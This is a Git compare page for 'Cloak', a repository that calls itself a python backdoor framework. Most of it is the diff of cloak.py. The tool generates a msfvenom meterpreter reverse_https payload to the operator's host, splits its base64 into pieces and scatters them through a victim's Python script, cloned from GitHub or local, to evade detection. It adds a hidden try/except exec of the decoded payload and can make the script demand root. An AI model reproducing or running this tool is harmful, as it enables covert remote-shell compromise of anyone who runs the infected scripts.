s0md3v/Cloak
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: s0md3v:78bd2fab6f32248bbb5a297760c9860635f52e1f
Branches Tags
s0md3v:master
...
compare: s0md3v:f81595e1b0ab4539c062b5601ed3e2c2c1512803
Branches Tags
s0md3v:master

10 Commits
78bd2fab6f ... f81595e1b0

Author SHA1 Message Date
whitesource-bolt-for-github[bot]
f81595e1b0 Initial WhiteSource configuration file 2019-05-05 15:49:34 +00:00
Somdev Sangwan
428592badc Update README.md 2018-03-03 10:04:16 +05:30
Somdev Sangwan
36e8728307 Added python3 support 2018-03-03 10:01:35 +05:30
Team Ultimate
02c5b852a4 Update cloak.py 2017-12-25 16:22:04 +05:30
Team Ultimate
e2a0d1ff8d Update cloak.py 2017-12-25 16:20:16 +05:30
Team Ultimate
d1a8823b1a Prompt user if no .py files are found 2017-12-25 16:18:33 +05:30
Team Ultimate
217e7a8e7b Merge pull request #1 from kreatemore/master 
Added error message if msfvenom is not installed
 2017-12-25 14:53:21 +05:30
Alex Szabó
955727d950 Fixed a typo 2017-12-23 14:19:47 +01:00
Alex Szabó
458edb0ddb Clarified variable 2017-12-23 14:18:12 +01:00
Alex Szabó
459596ebe6 Added error message if msfvenom is not installed 
Minor comment formatting and refactoring
 2017-12-23 14:02:51 +01:00
3 changed files with 142 additions and 93 deletions
Expand all files Collapse all files

8
.whitesource Normal file
View File

@@ -0,0 +1,8 @@
{
"generalSettings": {
"shouldScanRepo": true
},
"checkRunSettings": {
"vulnerableCheckRunConclusionLevel": "failure"
}
}

9
README.md
View File

@@ -1,6 +1,6 @@
# Cloak
<img src='https://i.imgur.com/m3scSAO.png' />
Cloak is an intelligent python backdoor framework.
Cloak is an intelligent python backdoor framework*.
## What it exactly does?
<b>Cloak</b> generates a python payload via <b>msfvenom</b> and then intelligently injects it into the python script you specify.
@@ -9,11 +9,12 @@ To evade basic detection, Cloak breaks the payload into several parts and places
Cloak will be further upgraded in future to support a wide range of payloads, platforms and evasion techniques.
### Demo
<img src='https://i.imgur.com/mEzDJp2.png' />
<img src='https://i.imgur.com/KJ9hTHo.png' />
### Requirements
### Compatibility
Cloak works best on Linux and is compatible with both python2 and python3.
Dependencies:
- msfvenom
- python2
### Contribute
For now, <b>Cloak</b> can backdoor python scripts but I am looking forward to do the same for <b>C</b>, <b>bash</b> and <b>perl</b> scripts.

212
cloak.py
View File

@@ -1,8 +1,14 @@
#!/usr/bin/env python2
import sys, os, socket, random
import os
import random
import socket
import sys
from re import search
#Colors and shit like that
if sys.version_info < (3, 0):
input = raw_input
# Colors and shit like that
white = '\033[1;97m'
green = '\033[1;32m'
red = '\033[1;31m'
@@ -13,151 +19,185 @@ bad = '\033[1;31m[-]\033[1;m'
good = '\033[1;32m[+]\033[1;m'
run = '\033[1;97m[>]\033[1;m'
#Banner
print '''%s
# Banner
print ('''%s
_________ %s__%s __
\%s_%s ___ \| | _________ | | __
/ \ \/| | / %s_%s \__ \ | |/ /
\ \___| |_( %s(_)%s ) %s__%s \| %s<%s
\______ /____/\____(____ /__|_ \\
%s\/%s \/ \/%s\n''' % (white, red, white, red, white, red, white, red, white, red, white, red, white, red, white, end)
%s\/%s \/ \/%s\n''' % (white, red, white, red, white, red, white, red, white, red, white, red, white, red, white, end))
#Connecting to google DNS and retrieving IP address of host
# Connecting to google DNS and retrieving IP address of host
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
LHOST = s.getsockname()[0]
s.close()
#Prompting the user for LHOST
choice = raw_input('%s %s%s%s : Use this as LHOST? [Y/n] ' % (que, green, LHOST, end)).lower()
def check_external_dependency(command, help=None):
check_command = os.system('command -v %s > /dev/null' % command)
if check_command != 0:
print ('%s%s Couldn\'t find %s!' % (bad, red, command))
if help:
print ('%s %s' % (info, help))
quit()
check_external_dependency(
'msfvenom',
help='See http://bit.ly/2pgJxxj for installation guide'
)
# Prompting the user for LHOST
choice = input('%s %s%s%s : Use this as LHOST? [Y/n] ' % (que, green, LHOST, end)).lower()
if choice == 'n':
LHOST = raw_input('%s Enter LHOST: ' % que)
#Prompting the user for LPORT
LHOST = input('%s Enter LHOST: ' % que)
# Prompting the user for LPORT
LPORT = '443'
choice = raw_input('%s %s%s%s : Use this as LPORT? [Y/n] ' % (que, green, LPORT, end)).lower()
choice = input('%s %s%s%s : Use this as LPORT? [Y/n] ' % (que, green, LPORT, end)).lower()
if choice == 'n':
LPORT = raw_input('%s Enter LPORT: ' % que)
LPORT = input('%s Enter LPORT: ' % que)
def import_choice():
script = raw_input('%s Enter Github/File path: ' % que)
script = input('%s Enter Github/File path: ' % que)
if 'https://github.com' in script:
github(script)
else:
local(script)
def local(script):
github = False
injector(script)
def github(script):
repo = script
directory = repo.split('/')[4] #Extracts repo name from github URL
cwd = os.path.dirname(os.path.abspath(__file__)) #Finds the path of cloak.py
os.system('git clone %s %s/%s -q' % (repo, cwd, directory)) #clones the repo
os.system('cd %s && ls > temp.txt' % directory) #Navigate to cloned repo and do ls and store its output in temp.txt
python_files = [] #we will store the found python files here
with open('%s/temp.txt' % directory, 'r') as f: #reading tmp.txt
directory = repo.split('/')[4] # Extracts repo name from github URL
cwd = os.path.dirname(os.path.abspath(__file__)) # Finds the path of cloak.py
os.system('git clone %s %s/%s -q' % (repo, cwd, directory)) # clones the repo
os.system('cd %s/%s && ls > temp.txt' % (cwd, directory)) # Navigate to cloned repo and do ls and store its output in temp.txt
python_files = [] # we will store the found python files here
with open('%s/%s/temp.txt' % (cwd, directory), 'r') as f: # reading tmp.txt
for line in f:
if '.py' in line: #if a file contains .py
python_files.append(line.strip('\n')) #adding the filename to python_files list
if '.py' in line: # if a file contains .py
python_files.append(line.strip('\n')) # adding the filename to python_files list
if len(python_files) == 0: # if there are 0 python files
print ('%s No python file found.' % bad)
yes_no = input('%s Would you like to manually select a file? [Y/n] ' % info).lower()
if yes_no == 'n':
quit()
else:
os.system('cd %s/%s && ls > temp.txt' % (cwd, directory)) # Navigate to cloned repo and do ls and store its output in temp.txt
all_files = [] # we will store all files here
with open('%s/%s/temp.txt' % (cwd, directory), 'r') as f: # reading tmp.txt
for line in f:
all_files.append(line.strip('\n')) # adding the filename to python_files list
number = 1
for file in all_files:
print ('%s. %s' % (number, file)) # it will print all files like 1. main.py 2. run.sh 3. test.txt
number = number + 1
number = input('%s Select a file to infect: ' % que) # asking the user to select a file to inject
script = all_files[int(number) - 1] # just simple maths to select the chosen file from all_files list
if len(python_files) == 0: #if there are 0 python files
print '%s No python file found.' % bad
elif len(python_files) > 1: #if there are more than 1 python files
print '%s More than one python scripts found.'
elif len(python_files) > 1: # if there are more than 1 python files
print ('%s More than one python scripts found.')
number = 1
for file in python_files:
print '%s. %s' % (number, file) #it will print all files like 1. main.py 2. run.py 3. test.py
print ('%s. %s' % (number, file)) # it will print all files like 1. main.py 2. run.py 3. test.py
number = number + 1
number = raw_input('%s Select a file to infect: ' % que) #asking the user to select a file to inject
script = python_files[int(number) - 1] #just simple maths to select the chosen file from python_files list
number = input('%s Select a file to infect: ' % que) # asking the user to select a file to inject
script = python_files[int(number) - 1] # just simple maths to select the chosen file from python_files list
elif len(python_files) == 1: #if there's 1 python file
script = python_files[0] #fetching the only element from the python_files list
print '%s Payload will be injected in %s%s%s' % (info, green, script, end)
os.system('rm -r %s/%s/temp.txt' % (cwd, directory)) #removes the temp.txt
cwd2 = os.chdir('%s/%s' % (cwd, directory)) #changes the working directory to the repo directory
elif len(python_files) == 1: # if there's 1 python file
script = python_files[0] # fetching the only element from the python_files list
print ('%s Payload will be injected in %s%s%s' % (info, green, script, end))
os.system('rm -r %s/%s/temp.txt' % (cwd, directory)) # removes the temp.txt
cwd2 = os.chdir('%s/%s' % (cwd, directory)) # changes the working directory to the repo directory
github = True
injector(script)
def injector(script):
method = 'https'
print '%s Generating Payload' % run
print ('%s Generating Payload' % run)
os.system("msfvenom -p python/meterpreter/reverse_%s -f raw --platform python -e generic/none -a python %s LPORT=%s > payload.txt" % (method, LHOST, LPORT))
payload = [] #a list containing
with open('payload.txt', 'r+') as f: #opens payload.txt
payload = [] # a list containing
with open('payload.txt', 'r+') as f: # opens payload.txt
for line in f:
payload.append(line.strip('\n')) #adds this line to payload list
f.close() #closes the file
payload = ''.join(payload) #converts payload list into a string
payload = payload.split("'") #converts the payload into a list by splitting it from the character '
base64_string = payload[3] #retireves the third *coughs* the fourth element from the payload list
print '%s Injecting into %s%s%s' % (run, green, script, end)
injectable_lines = [] #Lines where payload pieces can be inserted safely
imports = [] #lines that are being used to import libraries. Perfect for inserting 'import base64, sys'
script_list = [] #list that contains all the lines of target script
number = 0 #just a variable that we will be using later
with open(script, 'r') as f: #opens the target script
payload.append(line.strip('\n')) # adds this line to payload list
f.close() # closes the file
payload = ''.join(payload) # converts payload list into a string
payload = payload.split("'") # converts the payload into a list by splitting it from the character '
base64_string = payload[3] # retrieves the third *coughs* the fourth element from the payload list
print ('%s Injecting into %s%s%s' % (run, green, script, end))
injectable_lines = [] # Lines where payload pieces can be inserted safely
imports = [] # lines that are being used to import libraries. Perfect for inserting 'import base64, sys'
script_list = [] # list that contains all the lines of target script
number = 0 # just a variable that we will be using later
with open(script, 'r') as f: # opens the target script
for line in f:
script_list.append(line.strip('\n')) #adds current line to the script_list
match = search(r'^[a-zA-Z0-9]', line) #checks if the first character is an alphabet or digit
script_list.append(line.strip('\n')) # adds current line to the script_list
match = search(r'^[a-zA-Z0-9]', line) # checks if the first character is an alphabet or digit
match2 = search(r'^[\t]', line)
if match and not line.startswith('except') and not line.startswith('else') and not match2:
injectable_lines.append(number - 1) #add the line to injectable_lines list
if line.startswith('from') or line.startswith('import'): #if the line starts with from or import
imports.append(number) #add that line to imports list
else: #If the line doesn't start with tab, space, import, from
if match and not line.startswith('except') and not line.startswith('else') and not line.startswith('#') and not match2:
injectable_lines.append(number - 1) # add the line to injectable_lines list
if line.startswith('from') or line.startswith('import'): # if the line starts with from or import
imports.append(number) # add that line to imports list
else: # If the line doesn't start with tab, space, import, from
pass
number = number + 1 #increase the value of number by 1
f.close() #close the file
if 'import base64, sys' in script_list: #searches for 'import base64. sys' in script_list
print '%s Seems like this file has been already injected by Cloak.' % bad
if github == True:
choice = raw_input('%s Would you like to download a fresh copy? [Y/n]' % que).lower()
number = number + 1 # increase the value of number by 1
f.close() # close the file
if 'import base64, sys' in script_list: # searches for 'import base64. sys' in script_list
print ('%s Seems like this file has been already injected by Cloak.' % bad)
if github:
choice = input('%s Would you like to download a fresh copy? [Y/n]' % que).lower()
if choice == 'n':
pass
else:
os.chdir('%s' % cwd) #changes the working directory to the cloak.py directory
os.system('rm -r %s' % directory) #removes the older copy of downloaded repo
os.system('git clone %s %s/%s -q' % (repo, cwd, directory)) #clones the repo
cwd2 = os.chdir('%s/%s' % (cwd, directory)) #changes the working directory to the repo directory
injector() #Calls the injector() function
os.chdir('%s' % cwd) # changes the working directory to the cloak.py directory
os.system('rm -r %s' % directory) # removes the older copy of downloaded repo
os.system('git clone %s %s/%s -q' % (repo, cwd, directory)) # clones the repo
cwd2 = os.chdir('%s/%s' % (cwd, directory)) # changes the working directory to the repo directory
injector() # Calls the injector() function
else:
print '%s Please use a fresh file for injection.' % info
print ('%s Please use a fresh file for injection.' % info)
quit()
while True: #its an infinite loop unless its broken manually
#We can't insert all the pieces of payload in one place as it may raise suspicion so we will
#randomly select positions for those positions. random.choice(list) retrieve a random element from list
while True: # its an infinite loop unless its broken manually
# We can't insert all the pieces of payload in one place as it may raise suspicion so we will
# randomly select positions for those positions. random.choice(list) retrieve a random element from list
position_a, position_b = random.choice(injectable_lines), random.choice(injectable_lines)
position_c, position_d = random.choice(injectable_lines), random.choice(injectable_lines)
#lets make sure the positions of the pieces of payload are in a particular order otherwise it will raise error
if position_a < position_b and position_b < position_c and position_c < position_d:
script_list.insert(position_a + 1, 'var1 = \'\'\'%s\'\'\'' % base64_string[:len(base64_string)/2]) #[:len(string)/2] will give the first half of a string
script_list.insert(position_b + 2, 'var2 = \'\'\'%s\'\'\'' % base64_string[len(base64_string)/2:]) #and insert.list() is used to insert a element in list
script_list.insert(position_c + 3, 'vars = var1 + var2')
script_list.insert(position_d + 4, 'try:\n\texec(base64.b64decode({2:str,3:lambda b:bytes(b,\'UTF-8\')}[sys.version_info[0]](vars)))\nexcept:\n\tpass')
root = raw_input('%s Ask victim to run injected script as root? [y/N] ' % que).lower()
if position_a < position_b < position_c < position_d:
script_list.insert(int(position_a + 1), 'var1 = \'\'\'%s\'\'\'' % base64_string[:int(len(base64_string)/2)]) #[:len(string)/2] will give the first half of a string
script_list.insert(int(position_b + 2), 'var2 = \'\'\'%s\'\'\'' % base64_string[int(len(base64_string)/2):]) #and insert.list() is used to insert a element in list
script_list.insert(int(position_c + 3), 'vars = var1 + var2')
script_list.insert(int(position_d + 4), 'try:\n\texec(base64.b64decode({2:str,3:lambda b:bytes(b,\'UTF-8\')}[sys.version_info[0]](vars)))\nexcept:\n\tpass')
root = input('%s Ask victim to run injected script as root? [y/N] ' % que).lower()
if root == 'y':
root = True
if len(imports) < 1: #if there are no imports in the script
if len(imports) < 1: # if there are no imports in the script
if root:
script_list.insert(injectable_lines[0], 'import base64, sys, commands\nif (sys.platform.startswith("linux")) :\n\tif (commands.getoutput("whoami")) != "root" :\n\t\tprint ("%s needs to be run as root.")\n\t\tsys.exit()\n\telse:\n\t\tpass' % script)
script_list.insert(injectable_lines[0], 'import base64, sys, commands\nif (sys.platform.startswith("linux")) :\n\tif (commands.getoutput("whoami")) != "root" :\n\t\tprint ("%s needs to be run as root.")\n\t\tquit()\n' % script)
else:
script_list.insert(random.choice(imports), 'import base64, sys')
else:
if root:
script_list.insert(injectable_lines[0], 'import base64, sys, commands\nif (sys.platform.startswith("linux")) :\n\tif (commands.getoutput("whoami")) != "root" :\n\t\tprint ("%s needs to be run as root.")\n\t\tsys.exit()\n\telse:\n\t\tpass' % script)
script_list.insert(injectable_lines[0], 'import base64, sys, commands\nif (sys.platform.startswith("linux")) :\n\tif (commands.getoutput("whoami")) != "root" :\n\t\tprint ("%s needs to be run as root.")\n\t\tquit()\n' % script)
else:
script_list.insert(random.choice(imports), 'import base64, sys')
break #breaks the loop as the payload has been injected
else: #if the randomly selected variables are not in ascending order
break # breaks the loop as the payload has been injected
else: # if the randomly selected variables are not in ascending order
pass
with open(script, 'r+') as f: #opens the target script
with open(script, 'r+') as f: # opens the target script
for line in script_list:
f.write(line + '\n') #writes a line to the target script
f.close() #closes the file
os.system('rm payload.txt') #removes payload.txt
print '%s %s%s%s was successfully injected' % (good, green, script, end)
f.write(line + '\n') # writes a line to the target script
f.close() # closes the file
os.system('rm payload.txt') # removes payload.txt
print ('%s %s%s%s was successfully injected' % (good, green, script, end))
import_choice()